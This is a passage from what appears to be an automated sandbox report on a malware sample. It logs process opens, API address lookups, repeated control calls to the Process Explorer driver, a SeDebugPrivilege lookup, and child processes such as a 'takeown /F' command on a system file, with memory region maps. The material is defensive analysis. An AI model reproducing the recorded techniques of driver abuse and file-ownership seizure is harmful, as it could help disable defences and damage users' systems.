| Open | c:\windows\system32\msfeedssync.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\ciihmnxmn6ps\desktop\nwserbna.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\takeown.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\takeown.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\wscript.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wbem\wmiadap.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\consent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cacls.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\reg.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cacls.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cacls.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\takeown.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 |
Module (68)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x7ffc55800000 |
|
2 | |
| Get Handle | c:\windows\system32\ntdll.dll | base_address = 0x7ffc57b50000 |
|
15 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmn~1\appdata\local\temp\qry2vco264.exe, file_name_orig = C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | address_out = 0x7ffc558202a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x7ffc558223f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x7ffc558163c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x7ffc5581d920 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x7ffc55825620 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventExW, address_out = 0x7ffc55825580 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x7ffc558255e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7ffc55820e10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7ffc5581f110 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x7ffc57b8cb10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x7ffc57b95790 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x7ffc57b8ea10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x7ffc558228c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolWait, address_out = 0x7ffc57b8c470 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x7ffc57b95410 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x7ffc57be42f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x7ffc57bc95e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x7ffc57be3130 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7ffc55820fb0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x7ffc55842720 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x7ffc550fe7a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7ffc558428e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CompareStringEx, address_out = 0x7ffc55816010 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetDateFormatEx, address_out = 0x7ffc55842a00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7ffc55820310 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTimeFormatEx, address_out = 0x7ffc55842bc0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7ffc558225d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsValidLocaleName, address_out = 0x7ffc55842cd0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringEx, address_out = 0x7ffc55816000 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentPackageId, address_out = 0x7ffc550945e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTickCount64, address_out = 0x7ffc558165a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsWow64Process, address_out = 0x7ffc5581e960 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryInformationProcess, address_out = 0x7ffc57be36d0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryInformationThread, address_out = 0x7ffc57be3790 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQuerySystemInformation, address_out = 0x7ffc57be38a0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQuerySymbolicLinkObject, address_out = 0x7ffc57be4980 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryDirectoryObject, address_out = 0x7ffc57be47f0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtOpenSymbolicLinkObject, address_out = 0x7ffc57be46c0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtOpenDirectoryObject, address_out = 0x7ffc57be3ac0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryObject, address_out = 0x7ffc57be3640 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQuerySection, address_out = 0x7ffc57be3a50 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlInitAnsiString, address_out = 0x7ffc57bb5d30 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlInitUnicodeString, address_out = 0x7ffc57b6f0d0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlAnsiStringToUnicodeString, address_out = 0x7ffc57b736a0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlFreeUnicodeString, address_out = 0x7ffc57b77110 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlFreeAnsiString, address_out = 0x7ffc57b77110 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlUnicodeStringToAnsiString, address_out = 0x7ffc57b73dc0 |
|
1 |
Driver (250)
| Operation | Driver | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Control | \\.\PROCEXP152 | control_code = 0x83350048 |
|
157 | |
| Control | \\.\PROCEXP152 | control_code = 0x8335004c |
|
4 | |
| Control | \\.\PROCEXP152 | control_code = 0x8335003c |
|
8 | |
| Control | \\.\PROCEXP152 | control_code = 0x83350014 |
|
5 | |
| Control | \\.\PROCEXP152 | control_code = 0x8335000c |
|
76 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (16)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | - |
|
7 | |
| Get Info | - |
|
1 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
6 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Get Info | type = Operating System |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #170: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #170 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:06, Reason: Child Process |
| Unmonitor | End Time: 00:03:10, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8b0 |
| Parent PID | 0x4e8 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
76C
0x
E00
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000002f0000 | 0x002f0000 | 0x0030ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002f0000 | 0x002f0000 | 0x002fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x00303fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x00311fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x00310000 | 0x00314fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000320000 | 0x00320000 | 0x00333fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0037ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000380000 | 0x00380000 | 0x003bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003c0000 | 0x003c0000 | 0x003c3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000003d0000 | 0x003d0000 | 0x003d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003e1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x0042ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000430000 | 0x00430000 | 0x0046ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000470000 | 0x00470000 | 0x0047ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x006cffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00480000 | 0x0053dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x0056ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x00540fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000550000 | 0x00550000 | 0x00550fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000560000 | 0x00560000 | 0x0056ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00570000 | 0x00599fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x006cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006d0000 | 0x006d0000 | 0x00857fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000860000 | 0x00860000 | 0x009e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x009f0000 | 0x00d26fff | Memory Mapped File | r |
|
|
|
- |
| takeown.exe | 0x01220000 | 0x0122ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001230000 | 0x01230000 | 0x0522ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x0000000005230000 | 0x05230000 | 0x0662ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x742c0000 | 0x742e7fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f5c0000 | 0x7f5c0000 | 0x7f6bffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f6c0000 | 0x7f6c0000 | 0x7f6e2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f6e6000 | 0x7f6e6000 | 0x7f6e8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f6e9000 | 0x7f6e9000 | 0x7f6e9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f6ec000 | 0x7f6ec000 | 0x7f6eefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f6ef000 | 0x7f6ef000 | 0x7f6effff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #171: wmiprvse.exe
0
0
| Information | Value |
|---|---|
| ID | #171 |
| File Name | c:\windows\system32\wbem\wmiprvse.exe |
| Command Line | C:\Windows\system32\wbem\wmiprvse.exe -Embedding |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:09, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:53 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x420 |
| Parent PID | 0x23c (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
F20
0x
43C
0x
B04
0x
ED0
0x
A30
0x
8CC
0x
F64
0x
EF8
0x
DB0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x0000005bbf150000 | 0x5bbf150000 | 0x5bbf16ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005bbf150000 | 0x5bbf150000 | 0x5bbf15ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000005bbf160000 | 0x5bbf160000 | 0x5bbf166fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005bbf170000 | 0x5bbf170000 | 0x5bbf183fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005bbf190000 | 0x5bbf190000 | 0x5bbf20ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005bbf210000 | 0x5bbf210000 | 0x5bbf213fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000005bbf220000 | 0x5bbf220000 | 0x5bbf220fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005bbf230000 | 0x5bbf230000 | 0x5bbf231fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005bbf240000 | 0x5bbf240000 | 0x5bbf246fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005bbf250000 | 0x5bbf250000 | 0x5bbf250fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005bbf260000 | 0x5bbf260000 | 0x5bbf260fff | Private Memory | rw |
|
|
|
- |
| user32.dll.mui | 0x5bbf270000 | 0x5bbf274fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000005bbf280000 | 0x5bbf280000 | 0x5bbf280fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000005bbf290000 | 0x5bbf290000 | 0x5bbf38ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x5bbf390000 | 0x5bbf44dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000005bbf450000 | 0x5bbf450000 | 0x5bbf4cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005bbf4d0000 | 0x5bbf4d0000 | 0x5bbf58ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005bbf4d0000 | 0x5bbf4d0000 | 0x5bbf54ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005bbf550000 | 0x5bbf550000 | 0x5bbf550fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000005bbf560000 | 0x5bbf560000 | 0x5bbf560fff | Pagefile Backed Memory | r |
|
|
|
- |
| mssmbios.sys | 0x5bbf570000 | 0x5bbf57afff | Memory Mapped File | rw |
|
|
|
- |
| monitor.sys | 0x5bbf570000 | 0x5bbf579fff | Memory Mapped File | rw |
|
|
|
- |
| ndis.sys.mui | 0x5bbf570000 | 0x5bbf57ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000005bbf580000 | 0x5bbf580000 | 0x5bbf58ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x5bbf590000 | 0x5bbf8c6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000005bbf8d0000 | 0x5bbf8d0000 | 0x5bbfa57fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000005bbfa60000 | 0x5bbfa60000 | 0x5bbfbe0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000005bbfbf0000 | 0x5bbfbf0000 | 0x5bbfcaffff | Pagefile Backed Memory | r |
|
|
|
- |
| rpcss.dll | 0x5bbfcb0000 | 0x5bbfd85fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000005bbfcb0000 | 0x5bbfcb0000 | 0x5bbfdaffff | Private Memory | rw |
|
|
|
- |
| ole32.dll | 0x5bbfdb0000 | 0x5bbfef0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000005bbfdb0000 | 0x5bbfdb0000 | 0x5bbfe2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005bbfe30000 | 0x5bbfe30000 | 0x5bbfeaffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005bbfeb0000 | 0x5bbfeb0000 | 0x5bbff2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005bbff30000 | 0x5bbff30000 | 0x5bbffaffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005bbffb0000 | 0x5bbffb0000 | 0x5bc002ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005bc0030000 | 0x5bc0030000 | 0x5bc00affff | Private Memory | rw |
|
|
|
- |
| advapi32.dll | 0x5bc00b0000 | 0x5bc0152fff | Memory Mapped File | rw |
|
|
|
- |
| acpi.sys | 0x5bc00b0000 | 0x5bc0139fff | Memory Mapped File | rw |
|
|
|
- |
| ndis.sys | 0x5bc00b0000 | 0x5bc01cdfff | Memory Mapped File | rw |
|
|
|
- |
| hdaudbus.sys | 0x5bc00b0000 | 0x5bc00c3fff | Memory Mapped File | rw |
|
|
|
- |
| portcls.sys | 0x5bc00b0000 | 0x5bc00fefff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x00007df5ffbb0000 | 0x7df5ffbb0000 | 0x7ff5ffbaffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff71cdfa000 | 0x7ff71cdfa000 | 0x7ff71cdfbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff71cdfc000 | 0x7ff71cdfc000 | 0x7ff71cdfdfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff71cdfe000 | 0x7ff71cdfe000 | 0x7ff71cdfffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff71ce00000 | 0x7ff71ce00000 | 0x7ff71cefffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff71cf00000 | 0x7ff71cf00000 | 0x7ff71cf22fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff71cf23000 | 0x7ff71cf23000 | 0x7ff71cf24fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff71cf25000 | 0x7ff71cf25000 | 0x7ff71cf26fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff71cf27000 | 0x7ff71cf27000 | 0x7ff71cf28fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff71cf29000 | 0x7ff71cf29000 | 0x7ff71cf2afff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff71cf2b000 | 0x7ff71cf2b000 | 0x7ff71cf2cfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff71cf2d000 | 0x7ff71cf2d000 | 0x7ff71cf2dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff71cf2e000 | 0x7ff71cf2e000 | 0x7ff71cf2ffff | Private Memory | rw |
|
|
|
- |
| wmiprvse.exe | 0x7ff71d470000 | 0x7ff71d4eefff | Memory Mapped File | rwx |
|
|
|
- |
| ncobjapi.dll | 0x7ffc49550000 | 0x7ffc49565fff | Memory Mapped File | rwx |
|
|
|
- |
| wmiutils.dll | 0x7ffc496c0000 | 0x7ffc496e4fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemsvc.dll | 0x7ffc496f0000 | 0x7ffc49703fff | Memory Mapped File | rwx |
|
|
|
- |
| fastprox.dll | 0x7ffc49710000 | 0x7ffc49807fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemprox.dll | 0x7ffc4a370000 | 0x7ffc4a380fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemcomn.dll | 0x7ffc4d910000 | 0x7ffc4d98efff | Memory Mapped File | rwx |
|
|
|
- |
| wmiprov.dll | 0x7ffc505d0000 | 0x7ffc5060cfff | Memory Mapped File | rwx |
|
|
|
- |
| wmiclnt.dll | 0x7ffc51570000 | 0x7ffc51580fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7ffc53920000 | 0x7ffc53951fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffc53a90000 | 0x7ffc53ac2fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffc54210000 | 0x7ffc54226fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffc54280000 | 0x7ffc5428afff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffc543a0000 | 0x7ffc543c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc543d0000 | 0x7ffc5443afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc54610000 | 0x7ffc5461efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc552c0000 | 0x7ffc5535cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffc554e0000 | 0x7ffc5562dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffc55910000 | 0x7ffc559cdfff | Memory Mapped File | rwx |
|
|
|
- |
